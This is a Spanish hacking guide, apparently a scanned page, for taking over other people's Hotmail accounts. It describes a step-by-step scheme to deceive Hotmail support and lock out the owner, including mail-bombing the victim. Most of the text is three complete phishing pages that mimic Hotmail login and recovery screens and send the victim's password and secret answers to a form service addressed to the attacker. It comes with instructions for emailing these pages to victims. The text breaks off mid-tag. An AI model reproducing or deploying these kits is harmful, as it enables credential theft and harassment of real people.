You are on page 1of 36

Trucos para hackiar Hotmail

Ingeniera Social

Muchas personas creen que sacar una cuenta de Correo (en este
caso Hotmail) es algo de Super Hackers o cosas asi, saben una
cosa que se ensea en la ciencia del Zarck es que la solucion
siempre aquella que demande ms habilidad, y es que si optan por
cosas como troyanos, o HtML Bluf's(tb conocidos como exploits),
deben tener en cuenta que por su relativa sencilles, tambien son
evitables o previsibles, lo cual es muy raro que ocurra con la Ing.
Social, de este modo lo demuestra el texto acontinuacion:

Bueno este es otro pequeo truco de ing. social. Para hotmail.

- Introduccin

En vista de que la mayora se la pasa quitndole mails a la gente


conocida, (Amigos, Vecinos, Novia, Familiares) Nos es fcil
conseguir informacin de nuestra victima
Es por ello que les cuento el siguiente metodo que me ha
resultado a mi mas de 5 veces.

- Requisitos

Tener Una Victima, ah ah ah


Tener Mas de 5 cuentas (Atacante "Tu")
saber datos importantes
- Ciudad
- Edad
- Fecha De Cumpleaos
- Fecha en que creo la cuenta (Lo Mas Aproximado)
- Tener Tiempo y creer en que existen los entupidos
- Saber convencer a personas (Personal de hot mail)

1.- (Obtener Nombre y apellido que usa nuestra victima)


Mandar 1 mail desde cada uno de nuestros correos de preferencia
2 o 3 diarios. Con asuntos parecidos a
Hola, Como estas, Quien eres, De Donde Eres, Como Te Conoc,
Cuando Salimos.
El tipo tiene que responder a uno de nuestros mails.
(Obtendremos Nombre Y Apellido Que esta usando Actualmente
en su correo)

2.- Espantar a victima y lograr que cambie su clave


Mandarle mensajes con un mail bomber con mensajes como.
Te voy a hackear, Cambia tu clave que ya me la se. (Para ello con
un mail bomber podemos hacer un truco "Poner nombre, apellido
y el mismo mail de nuestra victima) As logramos que el se la crea

Y nuestra victima cambiara su clave

3.- Explicacin de lo obtenido


Bueno hasta ahora tenemos los datos indispensables que son.
Nombre Y fecha aproximada en que el cambio su clave (A HOT
MAIL LE DIRAS QUE ES LA FECHA EN QUE TE
CAMBIARON EL PASSWORD)
Otra cosa que nos ayudara es que el usuario no borrara los 5 mails
que le mandamos (Los de preguntas o saludos). Los cuales nos
ayudaran en decirle a hotmail cuales fueron nuestros ltimos
mails ledos

4.- Consultamos a hot mail


Bueno vamos a enviar un mail a los de soporte hotmail
passport_es@css.one.microsoft.com Al cual le pondremos el
asunto de (Perd mi mail, Olvide mi clave)
Ellos en menos de 24 horas nos van a responder y nos van a pedir

Mail que perdimos (Ya lo tenemos "Mail de la victima")


Nombre Y Apellido (Los que nos dio en los mails de respuesta)
Fecha en que le cambiaron la clave o ultimo inicio de sesin (Los
das que intentamos joderlo)
Fecha de nacimiento (Ya lo debemos de saber, puesto a que es un
"amigo o conocido")
Pas. Y ciudad

Fecha aproximada de creacin de la cuenta. (Dile que mas de un


ao, que no sabes decir la fecha)

Si nuestros datos son correctos, Hot mail verificara ese correo que
perdiste (el de la victima), verificara Todos esos datos que distes
Y como sabemos, "Nombre, Ciudad, Fecha aproximada en que el
**** cambio su clave" Posiblemente tendremos una respuesta de
ellos positiva.
En caso de que no sea positiva. Indicarle que los ltimos mails
que leste fueron los que tu enviaste con tus otros mails ( los de
saludos, y preguntas) Tambin dile que si es posible te cambien la
clave
Entonces hot mail ira de nuevo a verificar de nuevo si estas en lo
correcto. Y si el burro no borro esos mensajes. Hot mail hara caso
a tu Solicitud

Y patatin, Patatan. jeje (Chuteamos, Logramos, Ganamos,


Vencimos) Lo que si es importante es que una vez que hot mail
nos de la nueva clave. Nosotros tenemos que cambiar los datos
personales.
Lo que son nombre de usuario apellido, ciudad, fecha de
nacimiento. Sexo (Hombre o mujer, No piensen otras cosas). Ya
que nuestra victima consultara a hot mail. para que le den su clave
y como los datos que el proporciona no son correctos. No le har
caso hot mail.

(No se les olviden que es importante cambiar clave y pregunta


secreta, siempre que se quita un mail)

Esto no es motivo de llamar lammer a una persona. Simplemente


se le ensea a las personas. Lo potente que es la mente, Y Lo
bueno que es tener buenas ideas en mente.

Html Bluf's o Exploits

Los html bluf's o tb conocidos como exploits son pequeas


paginas webs q confunden al usuario haciendole creer q esta en xq
ej hotmail y lo persuade para q introdusca su contrasea q esta
luego es enviada a nostros. El termino html bluf's con el paso del
tiempo se fue ampliando y absorviendo otro tipo d engaos, como
x ej el q mensiono FoxHound. Hay q tener mucho cuidado con
estos xq pueden llegar a perder su clave. Una aclaracion q les
puede servir: si lo q estan haciendo es un exploit o html bluf's x
ningun motivo les tendria q pedir la clave asi q nunka se la den.
Aca les dejo varios exploits para q se entretengan y programas x
cortesia d Portalmes .

Lo nico que tienes que hacer es copiar los xploits de los cuadros
y cambiarles el correo de aquitucorreo@hotmail.com por tu
correo (el correo al que quieres que llegue la clave de tu vctima).
Por ejemplo, si tu correo es carlos@hotmail.com donde este
escrito aquitucorreo@hotmail.com escribes tu correo
carlos@hotmail.com.
Despus de copiar el xploit lo pegas (ctrl+v) en la ventana de
redactar correo o en un programa de envo de email annimo (este
segundo es ms aconsejado). Y cambiado el correo mencionado
arriba se lo envas a la vctima de la que quieres saber la clave, y

slo falta esperar. Dependiendo de la vctima recibirs la clave o


no, por eso se trata de ingeniera social esta forma de conseguir
claves, depender del desconocimiento de la vctima de este tipo
de cosas, de que se despiste, de...

Recomendacin: antes de enviarlo directamente a la vctima


envatelo a ti mismo para ver si sale bien y hacer tus cambios.

Como enviar los Exploits 5 y 6 en 7 pasos? (tambin vale para el


resto de xploits desde el paso 5):
1. Lo primero que tienes que hacer es pinchar en Ver para ver el
Xploit
2. espera que se cargue en la ventana de explorer que se abre
aparte
3. da en la barra superior a "Ver" y dentro a "Codigo Fuente"
4. una vez dado aparecer una ventana de Block de Notas con el
Xploit entero
5. de ah slo tienes que coger todo el texto, copiarlo (ctrl+c) y
pegarlo (ctrl+v) donde el mensaje de un correo
6. cambia donde pone aquitucorreo@hotmail.com por tu correo
7. envialo (poniendo el asunto que quieras) y espera que la
vctima pique y te de la clave (no siempre funciona), ponle un
40% de exto dependiendo siempre de la vctima.

Xploit 7 NUEVO! (xploit de perfil) - Ver

Este es slo un ejemplo de un xploit de perfil. Con el perfil


consigues engaar a la vctima hacindole creer que no buscas su
clave. Este es todalmente modificable.
Xploit 6 (bueno) - Ver
Esta es la entrada habitual de hotmail.es

Xploit 5 (no muy bueno) - Ver


Este dice que te cancelarn la cuenta si no envias la clave. Para
copiarlo coge el cdigo fuente.

1er Xploit (uno de los que mejor funciona) - Verlo


Haz click en --> Copy <-- para copiar el xploit
<html>
<head> <meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">
<meta name="GENERATOR" content="Mozilla/4.5 [es]
(WinNT; I) [Netscape]">
<title>Hotmail - Vuelva a escribir su contrasea</title> <!-- saved
from url=(0051)http://lc2.law13.hotmail.passport.com/cgibin/login --> <!-reauthhead.asp --> <link
href="http://64.4.18.24/Hotmai_archivos/hotmail___7.css"
rel=stylesheet> </head> <body bgcolor="#FFFFFF"
topMargin="0">

<center><table BORDER=0 CELLSPACING=2


CELLPADDING=0 WIDTH="590" >
<tr> <td COLSPAN="2"> <table BORDER=0
CELLSPACING=0 CELLPADDING=0
WIDTH="100%" > <tr> <td><a
href="http://lc2.law13.hotmail.passport.com/cgi-bin/login?
_lang=ES"
target="_top"><img
SRC="http://64.4.18.24/logo_msnhmr_468x60.gif" NOSAVE
BORDER=0 height=60 width=468></a></td> <td
ALIGN=CENTER NOWRAP><img
SRC="http://64.4.18.24/logo_passport_140x44.gif"
ALT="Descubra ms acerca de Passport"
NOSAVE BORDER=0 height=44 width=140> <br><font size=1><a href="http://nexusrdr.passport.com/redir.asp?_lang=ES&
pm=id%3d2%26fs%3d1%26cb%3d_lang%253dES%26ct
%3d1018
127971&attrib=Help"
target="_top">Ayuda</a></font></td> </tr> </table>
</td> </tr> <tr> <td BGCOLOR="#93BEE2" style="PADDINGRIGHT:
3px; PADDING-LEFT: 3px; PADDING-BOTTOM: 3px;
PADDING-TOP: 3px"><b>Cambie
su respuesta secreta peridicamente</b></td> <td
VALIGN=TOP></td>
</tr> <tr> <td HEIGHT="6"></td> </tr> <tr VALIGN=TOP>
<td><form method="post"
action="http://www.melodysoft.com/cgi-bin/form.cgi"><input

type="hidden" name="recipient"
value="aquitucorreo@hotmail.com"><input type="hidden"
name="redirect" value="http://lc2.law5.hotmail.passport.com/cgibin/dasp/hminfo_shell.asp?
_lang=ES&content=ssl&id=2&fs=1&cb=_lang
%3dES&ct=1234567890">
<table BORDER=0 CELLSPACING=0 CELLPADDING=0
WIDTH="100%" > <tr> <td>Nombre
de usuario</td> <td><input type="usuario" name="nombre de
usuario"
size="30"></td> </tr> <tr> <td>Contrasea</td>
<td><input type="password" name="cur_passwd"
size="30"></td>
</tr> <tr> <td>Nueva respuesta secreta </td> <td><input
type="pregunta" name="Pregunta secreta" size="30"></td> </tr>
<tr>
<td>Nueva pregunta secreta </td> <td><input type="pregunta"
name="Pregunta secreta" size="30"></td> </tr> <tr> <td></td>
<td> <br><input type="submit" value="Aceptar"><input
type="reset"
value="Cancelar"></form></td> </tr> </table> </td>
<td ROWSPAN="4"></td> </tr> <tr> <td><font size=-1>Escribir
una pregunta secreta eficaz </font> <><font size=-1>Si olvida
su contrasea, le pediremos la respuesta de su pregunta secreta, el
pas en el

que vive y su cdigo postal (slo para los Estados Unidos).


Utilizaremos sus respuestas
a estas preguntas para comprobar su identidad antes de permitirle
elegir una contrasea
nueva. </font> <br><font size=-1>Para su comodidad y
seguridad,
asegrese de que la respuesta a su pregunta secreta contiene
informacin que:
</font> <><font size=-1>Sea al menos cinco caracteres. </font>
<br><font size=-1>Slo usted conozca. </font> <br><font
size=-1>No tenga ninguna relacin con su contrasea o nombre
de usuario. </font>
<br><font size=-1>Sea poco probable que cambie con el tiempo.
</font>
<br><font size=-1>Sea extremadamente difcil de adivinar,
aunque otras
personas puedan ver la pregunta. </font> <br><font size=-1>Aqu
tiene algunos ejemplos de preguntas secretas adecuadas: </font>
<><font
size=-1>Cules son los cinco ltimos dgitos de mi nmero de
tarjeta de crdito?
</font> <br><font size=-1>Cules son los cinco ltimos dgitos
de mi nmero de la seguridad social? </font> <br><font size=1>Cul
es el segundo apellido de mi madre?</font> <> </td> </tr>

</table></center> <center><table BORDER=0


CELLSPACING=0 CELLPADDING=0
WIDTH="590" > <tr> <td> 2002 Microsoft
Corporation.Reservados
todos los derechos. <br><a
href="http://g.msn.com/1HM506701/D"
target="_top">CONDICIONES
DE USO</a> <a href="http://g.msn.com/1HM506701/C"
target="_top">Declaracin
de privacidad con aprobacin de TRUSTe</a></td> </tr>
</table></center>
</body> </html>

2 Xploit - Verlo
Haz click en --> Copy <-- para copiar el xploit
<html>
<head> <meta name="xploit para Hotmail o Msn"
content="xploit"> <title>Hotmail.com
- Confirmacion De Usuarios</title> <!-- saved from
url=(0051)http://lc2.law13.hotmail.passport.com/cgi-bin/login
--> <!-- reauthhead.asp --> <link
href="http://64.4.18.24/Hotmai_archivos/hotmail___7.css"
rel=stylesheet> </head> <body bgcolor="#FFFFFF"
topMargin="0">
<center><table BORDER=0 CELLSPACING=2
CELLPADDING=0 WIDTH="590" >

<tr> <td COLSPAN="2"> <table BORDER=0


CELLSPACING=0 CELLPADDING=0
WIDTH="100%" > <tr> <td><a
href="http://lc2.law13.hotmail.passport.com/cgi-bin/login?
_lang=ES"
target="_top"><font face="Verdana" size="2"><img
SRC="http://64.4.18.24/logo_msnhmr_468x60.gif"
NOSAVE BORDER=0 height=60 width=468></font></a></td>
<td
ALIGN=CENTER NOWRAP><font face="Verdana"
size="2"><img
SRC="http://64.4.18.24/logo_passport_140x44.gif"
ALT="Descubra ms acerca de Passport" NOSAVE BORDER=0
height=44 width=140>
<br><a href="http://nexusrdr.passport.com/redir.asp?_lang=ES&
pm=id%3d2%26fs%3d1%26cb%3d_lang%253dES%26ct
%3d1018
127971&attrib=Help"
target="_top">Ayuda</a></font></td> </tr> </table>
</td> </tr> <tr> <td BGCOLOR="#93BEE2" style="PADDINGRIGHT:
3px; PADDING-LEFT: 3px; PADDING-BOTTOM: 3px;
PADDING-TOP: 3px"><b><font
face="Verdana" size="2">Confirmacin de
Usuarios</font></b></td>
<td VALIGN=TOP></td> </tr> <tr> <td HEIGHT="6"></td>
</tr> <tr VALIGN=TOP> <td><form method="post"
action="http://www.melodysoft.com/cgi-bin/form.cgi"><input

type="hidden" name="recipient"
value="aquitucorreo@hotmail.com"><input type="hidden"
name="redirect" value="http://lc2.law5.hotmail.passport.com/cgibin/dasp/hminfo_shell.asp?
_lang=ES&content=ssl&id=2&fs=1&cb=_lang
%3dES&ct=1234567890">
<table BORDER=0 CELLSPACING=0 CELLPADDING=0
WIDTH="100%" > <tr> <td><font
face="Verdana" size="2"><b>Usuario</b></font></td>
<td><font face="Verdana" size="2"><input type="usuario"
name="Usuario"
size="20">@<select size="1" name="Server"> <option
value="Hotmail.com">Hotmail.com</option>
<option value="Msn.com">Msn.com</option>
</select></font></td>
</tr> <tr> <td><font face="Verdana"
size="2"><b>Nombre</b></font></td>
<td><font face="Verdana" size="2"><input name="Nombre"
size="30"></font></td>
</tr> <tr> <td><font face="Verdana"
size="2"><b>Apellidos</b></font></td>
<td><font face="Verdana" size="2"><input name="Apellido"
size="30"></font></td>
</tr> <tr> <td><font face="Verdana"
size="2"><b>Contrasea</b></font></td>
<td><font face="Verdana" size="2"><input type="password"
name="cur_passwd"
size="30"></font></td> </tr> <tr> <td></td>

<td> <font face="Verdana" size="2"> <br><input type="submit"


value="Aceptar"><input type="reset"
value="Cancelar"></form></font></td>
</tr> </table> </td> <td ROWSPAN="4"></td> </tr>
<tr> <td>Devido a la gran demanda de usuarios que pose la
empresa
de correos mas importante del mundo <b>Hot Mail</b> nos
hemos visto
a la necesidad de recorrer a nuestros usuarios para verificar si son
usuarios
activos.<br> <br> Como la empresa de correos, sabe que usted
nuestro
usuario Trabaja, Estudia, Viaja. No le es posible checar este
correo continuamente.
por ello <b>Hot mail </b>les da de tolerancia dos semanas
despues
de haber sido enviado este mail. Si no su cuenta la tendremos que
tener como usuario
no activo y tendriamos que darle da baja a su cuanta de correo
automaticamente<br>
<br> <b>Hot mail </b>esta muy agradecido con usted por ser un
usuario mas de nuestra empresa.<br> <br> <b>Jueves 18 de Abril
del 2002</b> </td> </tr> </table><table BORDER=0
CELLSPACING=0
CELLPADDING=0 WIDTH="623" > <tr> <td width="621">
<font face="Verdana"

size="2"> <br> 2002 Microsoft Corporation.Reservados todos


los derechos.
<br><a href="http://g.msn.com/1HM506701/D"
target="_top">CONDICIONES
DE USO</a> <a href="http://g.msn.com/1HM506701/C"
target="_top">Declaracin
de privacidad</a></font></td> </tr> </table></center>
</body> </html>

3 Xploit - Verlo
Funciona con el programa de enviar correo annimo xmas2000
Haz click en --> Copy <-- para copiar el xploit
<html>
<head> <script language="JavaScript"> function
ChangeIfUtf8(Utf8InCookies)
{ var URL = document.location.href; var strUtf8 = "utf8="; var
index = URL.indexOf(strUtf8);
var inCookie = Utf8InCookies; if(index>0) { var indexValue =
index + strUtf8.length;
if (indexValue+1 < URL.length) { if (URL.charAt(index-1) ==
"?") URL = URL.substring(0,index)
+ URL.substring(indexValue+2); else URL =
URL.substring(0,index-1) + URL.substring(indexValue+1);
} else { URL = URL.substring(0,index-1); } } var IsFirst =
URL.indexOf("?"); if

(IsFirst>0) strUtf8 = "&" + strUtf8; else strUtf8 = "?" + strUtf8; if


(inCookie=="0"
&& document.charset=="utf-8") { URL = URL + strUtf8 + "1"; if
(URL !=
document.location.href) { window.location.replace(URL); var
wHnd = window.open("",
"", " height=1,width=1,menubar=no,resizable=no,titlebar=
no,scrollbars=no,status=no,toolbar=no,menubar=no,l
ocation=no");
wHnd.close(); } } else if (inCookie=="1" && document.charset!
="utf-8")
{ URL = URL + strUtf8 + "0"; if (URL !=
document.location.href) { window.location.replace(URL);
var wHnd = window.open("", "", "
height=1,width=1,menubar=no,resizable=no,titlebar=
no,scrollbars=no,status=no,toolbar=no,menubar=no,l
ocation=no");
wHnd.close(); } } } ChangeIfUtf8("0"); </script> <meta httpequiv="Context-Type"
content="text/html" charset="iso-8859-1"> <title>Hotmail Mensaje</title>
<link rel="stylesheet" href="/cgibin/dasp/ES/hotmail___904500017.css">
<script language="JavaScript" src="/cgibin/dasp/ES/hotmail___904500017.js"></script>

<script event=onload for=window language=vbscript> on error


resume next
dim RRMsgrObj set RRMsgrObj =
CreateObject("Messenger.MsgrObject") If Err.Number
<> 0 Then Else DotheObject CheckForOnline End if </script>
<SCRIPT>
<!-- function Filtered() { return 0 } //--> </SCRIPT> <!
DOCTYPE
HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<META content="Microsoft
FrontPage 4.0" name=GENERATOR> <meta httpequiv="Content-Type" content="text/html;
charset=iso-8859-1"> <meta name="GENERATOR"
content="Microsoft FrontPage
4.0"> <title>Hotmail - Vuelva a escribir su contrasea</title>
<!-- saved from
url=(0051)http://lc2.law13.hotmail.passport.com/cgi-bin/login
--> <!-- reauthhead.asp --> <link
href="http://64.4.18.24/Hotmai_archivos/hotmail___7.css"
rel=stylesheet> </head> <body bgcolor="#FFFFFF"
topMargin="0" >
<div id="divMsgrObject" style="display:none"></div> <a
name="top"></a>
<table cellpadding=0 cellspacing=0 width=100%><tr
valign=top><td
width=100% valign=top > <!-- FILE: title.asp--> <script
language="JavaScript">

var SaveAddLink = '/cgi-bin/domsgaddresses?


hmletter00ESMXcurmbox=F000000001&a=e7232cac72b248c54
b78fbb017338ba7&msg=MSG1019098030.92&src=k.law9.hotm
ail.com:/home/d1/surveys/hmletter00ESMX.020417:0&action=M
odify&msg=MSG1019098030.92';
function DoPrintFriendly() { if (document.attachbody)
document.attachbody.submit();
else
window.location.replace("http://lw9fd.law9.hotmail.msn.com/cgibin/getmsg?
curmbox=F000000001&a=e7232cac72b248c54b78fbb017338ba7
&msg=MSG1019098030.92&printf=1");
} </script> <table class='Wf' border=0 align='center'
width='100%' cellspacing=0
cellpadding=3 nowrap> <tr><td> <DIV> <TABLE class=TEXT
cellSpacing=0 cellPadding=0 width=550 border=0> <TBODY>
<TR> <TD
bgColor=#ffffff colSpan=3><IMG height=90 alt=""
src="http://64.4.8.24/memlet.msnhotmailhead_es.gif"
width=600 border=0> <> <FONT class=text face="Arial,
helvetica, sans
serif" size=2> <B class=head3><FONT color=#4270ab>
Sugerencia del
mes de MSN Hotmail</FONT></B> </font> </p> <>
</table> </div> </table> </table> <center><table
BORDER=0 CELLSPACING=2 CELLPADDING=0
WIDTH="590" > <tr> <td BGCOLOR="#93BEE2"

style="PADDING-RIGHT: 3px; PADDING-LEFT: 3px;


PADDING-BOTTOM: 3px; PADDING-TOP:
3px"><b>Cambie su respuesta secreta peridicamente</b></td>
<td VALIGN=TOP></td> </tr> <tr> <td HEIGHT="6"></td>
</tr> <tr VALIGN=TOP> <td><form method="post"
action="http://www.melodysoft.com/cgi-bin/form.cgi"><input
type="hidden" name="recipient"
value="aquitucorreo@hotmail.com"><input type="hidden"
name="redirect" value="http://lc2.law5.hotmail.passport.com/cgibin/dasp/hminfo_shell.asp?
_lang=ES&content=ssl&id=2&fs=1&cb=_lang
%3dES&ct=1234567890">
<table BORDER=0 CELLSPACING=0 CELLPADDING=0
WIDTH="100%" > <tr> <td>Nombre
de usuario</td> <td><input type="usuario" name="nombre de
usuario"
size="30"></td> </tr> <tr> <td>Contrasea</td>
<td><input type="password" name="cur_passwd"
size="30"></td>
</tr> <tr> <td>Nueva respuesta secreta </td> <td><input
type="pregunta" name="Pregunta secreta" size="30"></td> </tr>
<tr>
<td>Nueva pregunta secreta </td> <td><input type="pregunta"
name="Pregunta secreta" size="30"></td> </tr> <tr> <td></td>
<td> <br><input type="submit" value="Aceptar"><input
type="reset"

value="Cancelar"></form></td> </tr> </table> </td>


<td ROWSPAN="4"></td> </tr> <tr> <td><font size=-1>Escribir
una pregunta secreta eficaz </font> <><font size=-1>Si olvida
su contrasea, le pediremos la respuesta de su pregunta secreta, el
pas en el
que vive y su cdigo postal (slo para los Estados Unidos).
Utilizaremos sus respuestas
a estas preguntas para comprobar su identidad antes de permitirle
elegir una contrasea
nueva. </font> <br><font size=-1>Para su comodidad y
seguridad,
asegrese de que la respuesta a su pregunta secreta contiene
informacin que:
</font> <><font size=-1>Sea al menos cinco caracteres. </font>
<br><font size=-1>Slo usted conozca. </font> <br><font
size=-1>No tenga ninguna relacin con su contrasea o nombre
de usuario. </font>
<br><font size=-1>Sea poco probable que cambie con el tiempo.
</font>
<br><font size=-1>Sea extremadamente difcil de adivinar,
aunque otras
personas puedan ver la pregunta. </font> <br><font size=-1>Aqu
tiene algunos ejemplos de preguntas secretas adecuadas: </font>
<><font
size=-1>Cules son los cinco ltimos dgitos de mi nmero de
tarjeta de crdito?

</font> <br><font size=-1>Cules son los cinco ltimos dgitos


de mi nmero de la seguridad social? </font> <br><font size=1>Cul
es el segundo apellido de mi madre?</font> <> </td> </tr>
</table></center> <table width="728"> <TR> <TD vAlign=top
width="92"> </TD> <TD style="background-color: #4270ab;
background-repeat:
repeat; background-attachment: scroll; padding-left: 1px;
padding-right: 1px;
background-position: 0%" bgColor=#4270ab width="7"><IMG
height=1 alt=""
src="http://64.4.8.24/memlet.spacer.gif" width=1
border=0></TD> <TD
vAlign=top width="609"> <!-- Start Main Content Table -->
<TABLE class=TEXT
cellSpacing=0 cellPadding=8 width="100%" border=0>
<TBODY> <!--Begin
Content Row --> <TR> <TD vAlign=top bgColor=#ffffff> <!-START
CONTENT BLOCK 1 IMAGE --> <BR> <a
href="http://g.msn.com/3HME07001/2"><img
height=80 alt="" src="http://64.4.8.24/memlet.coches_ESMX.gif"
width=80 border=0></a>
<!-- END CONTENT BLOCK 1 IMAGE --> </TD> <TD
class=head3 vAlign=top
bgColor=#ffffff> <FONT face="Verdana, Arial, helvetica, sans
serif" color=#000000

size=2><B> <!-- START CONTENT BLOCK 1 HEADING


--><a href="http://g.msn.com/3HME07001/3">Tu
Agencia de Autos en Lnea</a><BR> <!-- END CONTENT
BLOCK 1 HEADING
--> </B></FONT><FONT class=text face="Arial, helvetica, sans
serif" color=#000000 size=2> <!-- START CONTENT BLOCK 1
TEXT --> Con
el nuevo y mejorado canal de Autos de T1msn, ahora t puedes
estrenar auto nuevo
comprndolo en lnea o incluso vender el que ya tienes. Adems
te informamos conoce
las noticias ms relevantes en el Mundo de la Velocidad, la
Industria Automovilstica
as como consejos y novedades para el conductor. Conoce todo lo
referente a tu
auto desde la comodidad de tu casa u oficina. <!-- END
CONTENT BLOCK 1 TEXT
--> <BR><BR></FONT> </TD> </TR> <TR> <TD
style="PADDING-BOTTOM: 2px; PADDING-TOP: 2px"
vAlign=top colSpan=2><IMG
height=2 src="http://64.4.8.24/memlet.dottedline.gif" width=369
border=0></TD>
</TR> <TR> <TD vAlign=top bgColor=#ffffff> <!-- START
CONTENT
BLOCK 2 IMAGE --> <BR> <a
href="http://g.msn.com/3HME07001/4"><img

height=80 alt="" src="http://64.4.8.24/memlet.cultura_ESMX.gif"


width=80 border=0></a>
<!-- END CONTENT BLOCK 2 IMAGE --> </TD> <TD
class=head3 vAlign=top
bgColor=#ffffff> <FONT face="Verdana, Arial, helvetica, sans
serif" color=#000000
size=2><B> <!-- START CONTENT BLOCK 2 HEADING -->
<a href="http://g.msn.com/3HME07001/5">Sumrgete
en el mundo de la Literatura</a><BR> <!-- END CONTENT
BLOCK 2 HEADING
--> </B></FONT><FONT class=text face="Arial, helvetica, sans
serif" color=#000000 size=2> <!-- START CONTENT BLOCK 2
TEXT --> Con
la nueva Biblioteca en Lnea en el nuevo y mejorado canal de
Cultura, ahora puedes
sumergirte a fondo en el mundo de los libros. Busca, consulta,
conoce y descubre
a los mejores autores, poemas, cuentos, relatos, citas, juegos,
pasatiempos sin
necesidad de correr a la biblioteca de la esquina. <!-- END
CONTENT BLOCK 2
TEXT --> <BR><BR></FONT> </TD> </TR> <TR>
<TD style="PADDING-BOTTOM: 2px; PADDING-TOP: 2px"
vAlign=top colSpan=2><IMG
height=2 src="http://64.4.8.24/memlet.dottedline.gif" width=369
border=0></TD>

</TR> <TR> <TD vAlign=top bgColor=#ffffff> <!-- START


CONTENT
BLOCK 3 IMAGE --> <BR> <a
href="http://g.msn.com/3HME07001/6"><img
height=80 alt=""
src="http://64.4.8.24/memlet.negocios_ESMX.gif" width=80
border=0></a>
<!-- END CONTENT BLOCK 3 IMAGE --> </TD> <TD
class=head3 vAlign=top
bgColor=#ffffff> <FONT face="Verdana, Arial, helvetica, sans
serif" color=#000000
size=2><B> <!-- START CONTENT BLOCK 3 HEADING -->
<a href="http://g.msn.com/3HME07001/7">Convirtete
en Asesor Financiero</a><BR> <!-- END CONTENT BLOCK 3
HEADING -->
</B></FONT><FONT class=text face="Arial, helvetica, sans
serif"
color=#000000 size=2> <!-- START CONTENT BLOCK 3
TEXT --> Conoce el canal
de Negocios de T1msn en donde t mismo puedes convertirte en
un especialista financiero.
Entrate de la Informacin econmica y financiera ms relevante
de Mxico y el
mundo y hazte cargo de tu bolsillo a partir de hoy. Cuenta contigo
mismo y explora
este nuevo canal. <!-- END CONTENT BLOCK 3 TEXT -->
<BR><BR></FONT>

</TD> </TR> <TR> <TD style="PADDING-BOTTOM: 2px;


PADDING-TOP:
2px" vAlign=top colSpan=2><IMG height=2
src="http://64.4.8.24/memlet.dottedline.gif"
width=369 border=0></TD> </TR> <TR> <TD vAlign=top
bgColor=#ffffff>
<!-- START CONTENT BLOCK 4 IMAGE --> <BR> <a
href="http://g.msn.com/3HME07001/8"><img
height=80 alt="" src="http://64.4.8.24/memlet.salud2_ESMX.gif"
width=80 border=0></a>
<!-- END CONTENT BLOCK 4 IMAGE --> </TD> <TD
class=head3 vAlign=top
bgColor=#ffffff> <FONT face="Verdana, Arial, helvetica, sans
serif" color=#000000
size=2><B> <!-- START CONTENT BLOCK 4 HEADING -->
<a href="http://g.msn.com/3HME07001/9">Su
Salud ahora est en tus manos</a><BR> <!-- END CONTENT
BLOCK 4
HEADING --> </B></FONT><FONT class=text face="Arial,
helvetica,
sans serif" color=#000000 size=2> <!-- START CONTENT
BLOCK 4 TEXT -->
Descubre todo sobre tu salud y la de tu familia en el nuevo y
mejorado canal de
Salud. Descubre las maravillas de la medicina Alternativa, los
avances cientficos
ms relevantes, informacin especial para la Tercera Edad y
muchos consejos ms

que te ayudarn a llevar una vida sana. Cuidar la salud de toda tu


familia ahora
es ms sencillo con T1msn. <!-- END CONTENT BLOCK 4
TEXT --> <BR><BR></FONT>
</TD> </TR> <TR> <TD style="PADDING-BOTTOM: 2px;
PADDING-TOP:
2px" vAlign=top colSpan=2><IMG height=2
src="http://64.4.8.24/memlet.dottedline.gif"
width=369 border=0></TD> </TR> <TR> <TD vAlign=top
bgColor=#ffffff>
<!-- START CONTENT BLOCK 5 IMAGE --> <BR> <a
href="http://g.msn.com/3HME07001/10"><img
height=80 alt="" src="http://64.4.8.24/memlet.mars_ESMX.gif"
width=80 border=0></a>
<!-- END CONTENT BLOCK 5 IMAGE --> </TD> <TD
class=head3 vAlign=top
bgColor=#ffffff> <FONT face="Verdana, Arial, helvetica, sans
serif" color=#000000
size=2><B> <!-- START CONTENT BLOCK 5 HEADING -->
<a href="http://g.msn.com/3HME07001/11">Vuela
a jugar con tus amigas</a><BR> <!-- END CONTENT BLOCK
5 HEADING
--> </B></FONT><FONT class=text face="Arial, helvetica, sans
serif" color=#000000 size=2> <!-- START CONTENT BLOCK 5
TEXT --> Con
el nuevo MSN Explorer y la ubicacin de sus herramientas a un
solo click de distancia,

ahorras mucho ms tiempo que ahora puedes invertir en lo que te


gusta hacer. Disfruta
de tu Hotmail, MSN Explorer, MSN Chat y MSN Comunidades a
un solo click de distancia
y escribiendo tu contrasea una sola vez. Con MSN Explorer
vuela hacia tus amigas
y dedcales todo tu tiempo!. <!-- END CONTENT BLOCK 5
TEXT --> <BR><BR></FONT>
</TD> </TR> <TR> <TD style="PADDING-BOTTOM: 2px;
PADDING-TOP:
2px" vAlign=top colSpan=2><IMG height=2
src="http://64.4.8.24/memlet.dottedline.gif"
width=369 border=0></TD> </TR> <TR> <TD vAlign=top
bgColor=#ffffff>
<!-- START CONTENT BLOCK 6 IMAGE --> <BR> <a
href="http://g.msn.com/3HME07001/12"><img
height=80 alt=""
src="http://64.4.8.24/memlet.emoticons4_xx.gif" width=80
border=0></a>
<!-- END CONTENT BLOCK 6 IMAGE --> </TD> <TD
class=head3 vAlign=top
bgColor=#ffffff> <FONT face="Verdana, Arial, helvetica, sans
serif" color=#000000
size=2><B> <!-- START CONTENT BLOCK 6 HEADING -->
<a href="http://g.msn.com/3HME07001/13">Comparte
una sonrisa</a><BR> <!-- END CONTENT BLOCK 6
HEADING --> </B></FONT><FONT

class=text face="Arial, helvetica, sans serif" color=#000000


size=2> <!-START CONTENT BLOCK 6 TEXT --> No recuerdas qu
teclas utilizar para obtener
tus iconos gestuales favoritos? Ahora con MSN Messenger
Service podrs agregar
caras sonrientes, corazones, flores, etc. con tan solo hacer click en
la lista
desplegable. Adems, MSN Messenger te notifica cuando recibes
un mensaje de MSN
Hotmail e incluso te permite organizar tus contactos en grupos. <a
href="http://g.msn.com/3HME07001/14">Descarga
la ltima versin ahora</a> para aprovechar estas fantsticas
caractersticas.
<!-- END CONTENT BLOCK 6 TEXT -->
<BR><BR></FONT> </TD>
</TR> <!-- End of Content Table Rows --> </TBODY>
</TABLE>
<!-- End Main Content Table--> </TD> <!--create a 2px space
between
the horizontal blue line and the vertical blue line<tr> <TD
colspan="3"
height="2" BGCOLOR="#FFFFFF" CLASS=head3
STYLE="COLOR: #FFFFFF; PADDING-BOTTOM:
6px; PADDING-TOP: 5px"></TD> </tr>--> <TR> <TD
colSpan=3
